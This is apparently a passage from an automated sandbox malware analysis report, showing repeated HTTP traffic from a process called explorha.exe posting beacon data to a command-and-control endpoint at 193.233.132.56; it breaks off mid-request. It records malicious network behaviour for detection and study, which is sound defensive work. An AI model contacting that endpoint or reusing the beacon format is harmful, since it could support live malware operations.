Apr 19, 2024 03:29:37.400942087 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49799 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:37.762373924 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:38.005568981 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:38.006568909 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:38.253547907 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49800 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:38.611541033 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:38.856164932 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:38.857573986 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:39.104885101 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.5  49802        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:29:39.480129004 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:39.728435040 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:39.769382954 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:40.022821903 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.5  49805        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:29:40.382827997 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:40.629853010 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:40.633198023 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:40.884537935 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.5  49810        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:29:41.259679079 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:41.508354902 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:41.509511948 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:41.763334036 CEST  196  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.5  49812        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:29:42.134469986 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:29:42.379851103 CEST  219  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Apr 19, 2024 03:29:42.380669117 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:42.629538059 CEST  196  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.5  49814        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:29:42.997772932 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:29:43.242815971 CEST  219  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Apr 19, 2024 03:29:43.243563890 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:43.492702007 CEST  196  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
31          192.168.2.5  49815        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:29:43.869604111 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:29:44.118108988 CEST  219  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Apr 19, 2024 03:29:44.120521069 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:44.373209000 CEST  196  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
32   192.168.2.5   49817   193.233.132.56   80   4484   C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp   Bytes transferred   Direction   Data
Apr 19, 2024 03:29:44.816508055 CEST   158   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:45.059449911 CEST   219   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:45.060233116 CEST   312   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:45.307044983 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
33   192.168.2.5   49820   193.233.132.56   80   4484   C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp   Bytes transferred   Direction   Data
Apr 19, 2024 03:29:45.661050081 CEST   158   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:45.905271053 CEST   219   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:45.906037092 CEST   312   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:46.155529976 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
34   192.168.2.5   49821   193.233.132.56   80   4484   C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp   Bytes transferred   Direction   Data
Apr 19, 2024 03:29:46.506915092 CEST   158   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:46.758116007 CEST   219   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:46.758900881 CEST   312   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
